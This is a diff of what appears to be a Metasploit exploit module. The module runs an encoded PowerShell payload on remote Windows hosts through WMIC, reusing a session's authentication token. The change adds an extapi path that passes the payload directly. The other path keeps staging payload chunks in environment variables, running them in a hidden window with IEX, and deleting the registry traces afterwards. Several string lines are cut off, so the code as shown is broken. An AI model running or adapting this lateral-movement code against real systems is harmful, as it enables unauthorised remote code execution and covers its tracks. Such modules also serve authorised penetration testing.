@@ -27,9 +27,8 @@ def initialize(info={})
2727 the session's current authentication token instead of having to know
2828 a password or hash.
2929
30- We do not get feedback from the WMIC command so there are no
31- indicators of success or failure. The remote host must be configured
32- to allow remote Windows Management Instrumentation.
30+ The remote host must be configured to allow remote Windows Management
31+ Instrumentation.
3332 } ,
3433 'License' => MSF_LICENSE ,
3534 'Author' => [
@@ -76,42 +75,50 @@ def exploit
7675 end
7776
7877 def run_host ( server )
78+ if load_extapi
79+ psh_options = { :remove_comspec => true ,
80+ :encode_final_payload => true }
81+ else
82+ psh_options = { :remove_comspec => true ,
83+ :encode_inner_payload => true ,
84+ :use_single_quotes => true }
85+ end
7986 # Get the PSH Payload and split it into bitesize chunks
8087 # 1024 appears to be the max value allowed in env vars
8188 psh = cmd_psh_payload ( payload . encoded ,
8289 payload_instance . arch . first ,
83- {
84- :remove_comspec => true ,
85- :encode_inner_payload => true ,
86- :use_single_quotes => true
87- } )
88- chunks = split_code ( psh , 1000 )
90+ psh_options )
8991
9092 begin
91- print_status ( "[#{ server } )
92- env_name = rand_text_alpha ( rand ( 3 ) +3 )
93- env_vars = [ ]
94- 0 . upto ( chunks . length -1 ) do |i |
95- env_vars << "#{ env_name } #{ i }
96- c = "cmd /c SETX #{ env_vars [ i ] } \" #{ chunks [ i ] } \" /m"
97- result = wmic_command ( c , server )
98-
99- unless result
100- print_error ( "[#{ server } )
101- return false
93+ if load_extapi
94+ exec_cmd = psh
95+ else
96+ print_status ( "[#{ server } )
97+ chunks = split_code ( psh , 1000 )
98+ env_name = rand_text_alpha ( rand ( 3 ) +3 )
99+ env_vars = [ ]
100+ 0 . upto ( chunks . length -1 ) do |i |
101+ env_vars << "#{ env_name } #{ i }
102+ c = "cmd /c SETX #{ env_vars [ i ] } \" #{ chunks [ i ] } \" /m"
103+ result = wmic_command ( c , server )
104+
105+ unless result
106+ print_error ( "[#{ server } )
107+ return false
108+ end
102109 end
103- end
104110
105- x = rand_text_alpha ( rand ( 3 ) +3 )
106- exec_cmd = generate_psh_command_line ( {
107- :noprofile => true ,
108- :windowstyle => 'hidden' ,
109- :command => "$#{ x }
110- } )
111- env_vars . each do |env |
112- exec_cmd << "+$env:#{ env }
111+ x = rand_text_alpha ( rand ( 3 ) +3 )
112+ exec_cmd = generate_psh_command_line ( {
113+ :noprofile => true ,
114+ :windowstyle => 'hidden' ,
115+ :command => "$#{ x }
116+ } )
117+ env_vars . each do |env |
118+ exec_cmd << "+$env:#{ env }
119+ end
120+ exec_cmd << ";IEX $#{ x }
113121 end
114- exec_cmd << ";IEX $#{ x }
115122
116123 print_status ( "[#{ server } )
117124 result = wmic_command ( exec_cmd , server )
@@ -126,10 +133,12 @@ def run_host(server)
126133 print_error ( "[#{ server } )
127134 end
128135
129- print_status ( "[#{ server } )
130- env_vars . each do |env |
131- cleanup_cmd = "cmd /c REG delete \" HKLM\\ \S YSTEM\\ CurrentControlSet\\ Control\\ Session Manager\\ Environment\" /V #{ env }
132- wmic_command ( cleanup_cmd , server )
136+ unless load_extapi
137+ print_status ( "[#{ server } )
138+ env_vars . each do |env |
139+ cleanup_cmd = "cmd /c REG delete \" HKLM\\ \S YSTEM\\ CurrentControlSet\\ Control\\ Session Manager\\ Environment\" /V #{ env }
140+ wmic_command ( cleanup_cmd , server )
141+ end
133142 end
134143 rescue Rex ::Post ::Meterpreter ::RequestError => e
135144 print_error ( "[#{ server } #{ e } )
0 commit comments